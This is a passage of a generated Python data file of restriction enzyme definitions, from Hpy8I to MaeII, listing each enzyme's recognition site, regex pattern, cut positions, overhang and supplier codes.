'scd5': None,
'site': 'CCTYNA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy300XI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTNNAC'),
'compsite': '(?=(?P<Hpy8I>GT..AC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTNNAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Hpy8I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CGWCG'),
'compsite': '(?=(?P<Hpy99I>CG[AT]CG))',
'dna': None,
'freq': 512.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'CGWCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGWCG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Hpy99I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCCTA'),
'compsite': '(?=(?P<Hpy99XIII>GCCTA))|(?=(?P<Hpy99XIII_as>TAGGC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCTA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy99XIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGWTAA'),
'compsite': '(?=(?P<Hpy99XIV>GG[AT]TAA))|(?=(?P<Hpy99XIV_as>TTA[AT]CC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWTAA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy99XIV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGWCNA'),
'compsite': '(?=(?P<Hpy99XIV_mut1>GG[AT]C.A))|(?=(?P<Hpy99XIV_mut1_as>T.G[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCNA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy99XIV_mut1'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TCANNNNNNTRG'),
'compsite': '(?=(?P<Hpy99XXII>TCA......T[AG]G))|(?=(?P<Hpy99XXII_as>C[CT]A......TGA))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCANNNNNNTRG',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hpy99XXII'] = _temp()
def _temp():
return {
'charac': (11, 5, None, None, 'CCTTC'),
'compsite': '(?=(?P<HpyAV>CCTTC))|(?=(?P<HpyAV_as>GAAGG))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['HpyAV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGTA'),
'compsite': '(?=(?P<HpyAXIV>GCGTA))|(?=(?P<HpyAXIV_as>TACGC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGTA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyAXIV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRTTAA'),
'compsite': '(?=(?P<HpyAXVI_mut1>C[AG]TTAA))|(?=(?P<HpyAXVI_mut1_as>TTAA[CT]G))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRTTAA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyAXVI_mut1'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRTCNA'),
'compsite': '(?=(?P<HpyAXVI_mut2>C[AG]TC.A))|(?=(?P<HpyAXVI_mut2_as>T.GA[CT]G))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRTCNA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyAXVI_mut2'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'ACNGT'),
'compsite': '(?=(?P<HpyCH4III>AC.GT))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACNGT',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['HpyCH4III'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACGT'),
'compsite': '(?=(?P<HpyCH4IV>ACGT))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGT',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['HpyCH4IV'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TGCA'),
'compsite': '(?=(?P<HpyCH4V>TGCA))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGCA',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['HpyCH4V'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GCNNNNNNNGC'),
'compsite': '(?=(?P<HpyF10VI>GC.......GC))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNNNNNNNGC',
'size': 11,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['HpyF10VI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTNAG'),
'compsite': '(?=(?P<HpyF3I>CT.AG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTNAG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['HpyF3I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACGT'),
'compsite': '(?=(?P<HpySE526I>ACGT))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGT',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['HpySE526I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CYANNNNNNNTRG'),
'compsite': '(?=(?P<HpyUM032XIII>C[CT]A.......T[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYANNNNNNNTRG',
'size': 13,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyUM032XIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CYANNNNNNNTTC'),
'compsite': '(?=(?P<HpyUM032XIII_mut1>C[CT]A.......TTC))|(?=(?P<HpyUM032XIII_mut1_as>GAA.......T[AG]G))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYANNNNNNNTTC',
'size': 13,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyUM032XIII_mut1'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAAG'),
'compsite': '(?=(?P<HpyUM032XIV>GAAAG))|(?=(?P<HpyUM032XIV_as>CTTTC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAAG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyUM032XIV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TNGGNAG|GTGGNAG'),
'compsite': '(?=(?P<HpyUM037X>T.GG.AG))|(?=(?P<HpyUM037X_as>CT.CC.A))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TNGGNAG|GTGGNAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HpyUM037X'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GRCGYC'),
'compsite': '(?=(?P<Hsp92I>G[AG]CG[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRCGYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('R',),
}
rest_dict['Hsp92I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CATG'),
'compsite': '(?=(?P<Hsp92II>CATG))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('R',),
}
rest_dict['Hsp92II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGC'),
'compsite': '(?=(?P<HspAI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['HspAI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTATNAC'),
'compsite': '(?=(?P<Jma19592I>GTAT.AC))|(?=(?P<Jma19592I_as>GT.ATAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Jma19592I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GRGCRAC'),
'compsite': '(?=(?P<Jma19592II>G[AG]GC[AG]AC))|(?=(?P<Jma19592II_as>GT[CT]GC[CT]C))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCRAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Jma19592II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GRNGAAT'),
'compsite': '(?=(?P<Jsp2502II>G[AG].GAAT))|(?=(?P<Jsp2502II_as>ATTC.[CT]C))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRNGAAT',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Jsp2502II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGCGCC'),
'compsite': '(?=(?P<KasI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['KasI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGGWCCC'),
'compsite': '(?=(?P<KflI>GGG[AT]CCC))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGWCCC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['KflI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RTCGAG'),
'compsite': '(?=(?P<Kor51II>[AG]TCGAG))|(?=(?P<Kor51II_as>CTCGA[CT]))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RTCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Kor51II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRTGATT'),
'compsite': '(?=(?P<Kpn156V>C[AG]TGATT))|(?=(?P<Kpn156V_as>AATCA[CT]G))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRTGATT',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Kpn156V'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<Kpn2I>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Kpn2I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GACATC'),
'compsite': '(?=(?P<Kpn327I>GACATC))|(?=(?P<Kpn327I_as>GATGTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACATC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Kpn327I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GGTACC'),
'compsite': '(?=(?P<KpnI>GGTACC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTACC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['KpnI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTRGAG'),
'compsite': '(?=(?P<KpnNH25III>CT[AG]GAG))|(?=(?P<KpnNH25III_as>CTC[CT]AG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTRGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['KpnNH25III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTTCNAC'),
'compsite': '(?=(?P<KpnNIH30III>GTTC.AC))|(?=(?P<KpnNIH30III_as>GT.GAAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTCNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['KpnNIH30III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCYAAG'),
'compsite': '(?=(?P<KpnNIH50I>GC[CT]AAG))|(?=(?P<KpnNIH50I_as>CTT[AG]GC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCYAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['KpnNIH50I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCCGGC'),
'compsite': '(?=(?P<KroI>GCCGGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['KroI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TGATCA'),
'compsite': '(?=(?P<Ksp22I>TGATCA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGATCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Ksp22I'] = _temp()
def _temp():
return {
'charac': (7, 4, None, None, 'CTCTTC'),
'compsite': '(?=(?P<Ksp632I>CTCTTC))|(?=(?P<Ksp632I_as>GAAGAG))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCTTC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ksp632I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTTAAC'),
'compsite': '(?=(?P<KspAI>GTTAAC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTAAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['KspAI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CCGCGG'),
'compsite': '(?=(?P<KspI>CCGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('M', 'S'),
}
rest_dict['KspI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<Kzo9I>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Kzo9I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CYAAANG'),
'compsite': '(?=(?P<Lba2029III>C[CT]AAA.G))|(?=(?P<Lba2029III_as>C.TTT[AG]G))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYAAANG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lba2029III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACAAAG'),
'compsite': '(?=(?P<Lde4408II>ACAAAG))|(?=(?P<Lde4408II_as>CTTTGT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACAAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lde4408II'] = _temp()
def _temp():
return {
'charac': (8, 4, None, None, 'GCTCTTC'),
'compsite': '(?=(?P<LguI>GCTCTTC))|(?=(?P<LguI_as>GAAGAGC))',
'dna': None,
'freq': 16384.0,
'fst3': 4,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTCTTC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['LguI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCGTKA'),
'compsite': '(?=(?P<LlaG50I>CCGT[GT]A))|(?=(?P<LlaG50I_as>T[AC]ACGG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGTKA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['LlaG50I'] = _temp()
def _temp():
return {
'charac': (6, -1, None, None, 'GCTCC'),
'compsite': '(?=(?P<LmnI>GCTCC))|(?=(?P<LmnI_as>GGAGC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['LmnI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCGCCG'),
'compsite': '(?=(?P<Lmo370I>AGCGCCG))|(?=(?P<Lmo370I_as>CGGCGCT))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCGCCG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lmo370I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TAGRAG'),
'compsite': '(?=(?P<Lmo911II>TAG[AG]AG))|(?=(?P<Lmo911II_as>CT[CT]CTA))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TAGRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lmo911II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGGRAG'),
'compsite': '(?=(?P<Lpl1004II>AGG[AG]AG))|(?=(?P<Lpl1004II_as>CT[CT]CCT))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lpl1004II'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'RGCGCY'),
'compsite': '(?=(?P<LpnI>[AG]GCGC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCGCY',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['LpnI'] = _temp()
def _temp():
return {
'charac': (14, 14, None, None, 'CCDG'),
'compsite': '(?=(?P<LpnPI>CC[AGT]G))|(?=(?P<LpnPI_as>C[ACT]GG))',
'dna': None,
'freq': 85.33333333333333,
'fst3': 14,
'fst5': 14,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCDG',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['LpnPI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTTCNAG'),
'compsite': '(?=(?P<Lra68I>GTTC.AG))|(?=(?P<Lra68I_as>CT.GAAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTCNAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lra68I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TGGAAT'),
'compsite': '(?=(?P<LsaDS4I>TGGAAT))|(?=(?P<LsaDS4I_as>ATTCCA))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGAAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['LsaDS4I'] = _temp()
def _temp():
return {
'charac': (13, 12, None, None, 'GCAGC'),
'compsite': '(?=(?P<Lsp1109I>GCAGC))|(?=(?P<Lsp1109I_as>GCTGC))',
'dna': None,
'freq': 1024.0,
'fst3': 12,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Lsp1109I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCACC'),
'compsite': '(?=(?P<Lsp48III>AGCACC))|(?=(?P<Lsp48III_as>GGTGCT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCACC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lsp48III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRAGCAC'),
'compsite': '(?=(?P<Lsp6406VI>C[AG]AGCAC))|(?=(?P<Lsp6406VI_as>GTGCT[CT]G))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRAGCAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lsp6406VI'] = _temp()
def _temp():
return {
'charac': (10, 9, None, None, 'GCATC'),
'compsite': '(?=(?P<LweI>GCATC))|(?=(?P<LweI_as>GATGC))',
'dna': None,
'freq': 1024.0,
'fst3': 9,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['LweI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCWGGT'),
'compsite': '(?=(?P<MabI>ACC[AT]GGT))',
'dna': None,
'freq': 8192.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCWGGT',
'size': 7,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['MabI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTAG'),
'compsite': '(?=(?P<MaeI>CTAG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAG',
'size': 4,
'substrat': 'DNA',
'suppl': ('M',),
}
rest_dict['MaeI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACGT'),
'compsite': '(?=(?P<MaeII>ACGT))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGT',
'size': 4,
